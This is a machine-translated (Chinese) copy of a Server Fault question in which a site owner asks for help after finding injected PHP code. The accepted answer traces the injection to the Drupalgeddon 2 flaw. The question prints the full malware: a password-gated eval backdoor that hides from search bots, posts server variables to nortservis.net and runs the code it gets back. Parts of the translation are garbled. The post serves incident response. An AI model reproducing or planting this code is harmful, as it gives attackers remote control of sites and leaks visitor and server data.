块注入黑客
块注入黑客
提问于 2018-06-22 11:28:20
有人给我的php文件注入了以下代码:
if(md5($_POST["pf"]) === "93ad003d7fc57aae938ba483a65ddf6d") {
eval(base64_decode($_POST["cookies_p"])); }
if (strpos($_SERVER['REQUEST_URI'], "post_render" ) !== false) { $patchedfv = "GHKASMVG"; }
if( isset( $_REQUEST['fdgdfgvv'] ) ) { if(md5($_REQUEST['fdgdfgvv']) === "93ad003d7fc57aae938ba483a65ddf6d") { $patchedfv = "SDFDFSDF"; } }
if($patchedfv === "GHKASMVG" ) { @ob_end_clean(); die; }
if (strpos($_SERVER["HTTP_USER_AGENT"], "Win" ) === false) { $kjdke_c = 1; }
error_reporting(0);
if(!$kjdke_c) { global $kjdke_c; $kjdke_c = 1;
global $include_test; $include_test = 1;
$bkljg=$_SERVER["HTTP_USER_AGENT"];
$ghfju = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "bot", "spid", "Lynx", "PHP", "WordPress". "integromedb","SISTRIX","Aggregator", "findlinks", "Xenu", "BacklinkCrawler", "Scheduler", "mod_pagespeed", "Index", "ahoo", "Tapatalk", "PubSub", "RSS", "WordPress");
if( !($_GET['df'] === "2") and !($_POST['dl'] === "2" ) and ((preg_match("/" . implode("|", $ghfju) . "/i", $bkljg)) or (@$_COOKIE['condtions']) or (!$bkljg) or ($_SERVER['HTTP_REFERER'] === "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']) or ($_SERVER['REMOTE_ADDR'] === "127.0.0.1") or ($_SERVER['REMOTE_ADDR'] === $_SERVER['SERVER_ADDR']) or ($_GET['df'] === "1") or ($_POST['dl'] === "1" )))
{}
else
{
foreach($_SERVER as $ndbv => $cbcd) { $data_nfdh.= "&REM_".$ndbv."='".base64_encode($cbcd)."'";}
$context_jhkb = stream_context_create(
array('http'=>array(
'timeout' => '15',
'header' => "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.9) Gecko/20100101 Firefox/10.0.9_ Iceweasel/10.0.9\r\nConnection: Close\r\n\r\n",
'method' => 'POST',
'content' => "REM_REM='1'".$data_nfdh
)));
$vkfu=file_get_contents("http://nortservis.net/session.php?id", false ,$context_jhkb);
if($vkfu) { @eval($vkfu); } else {ob_start(); if(!@headers_sent()) { @setcookie("condtions","2",time()+172800); } else { echo "document.cookie='condtions=2; path=/; expires=".date('D, d-M-Y H:i:s',time()+172800)." GMT;';"; } ;};
}
}我阻止了/etc/主机中的nortservis.net。我禁用了允许-php-url-fopen。我在服务器上有fail2ban,但是它没有捕捉到这个。我能做什么?
回答 1
Server Fault用户
回答已采纳
发布于 2018-06-23 06:56:33
几周前,我遇到了与您相同的问题:我的服务器中的php文件被注入了相同的代码的<#>exactly。
在我的例子中,我发现我的Drupal站点不是最新的,并且被称为Drupp代数known 2(又名SA 2018-002)的漏洞所利用,该漏洞被用来篡改我的系统并注入这个php。鉴于漏洞的严重性,我清除了我的服务器并重新安装了它(经验教训:保持您的系统更新!)
如果您有Drupal,请验证您的版本是最新的,并且不容易受到SA 2018-002的攻击。攻击该漏洞可能会在您的访问日志中显示为可疑的POST记录。
页面原文内容由Server Fault提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:
https://serverfault.com/questions/917777
复制相关文章
相似问题
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号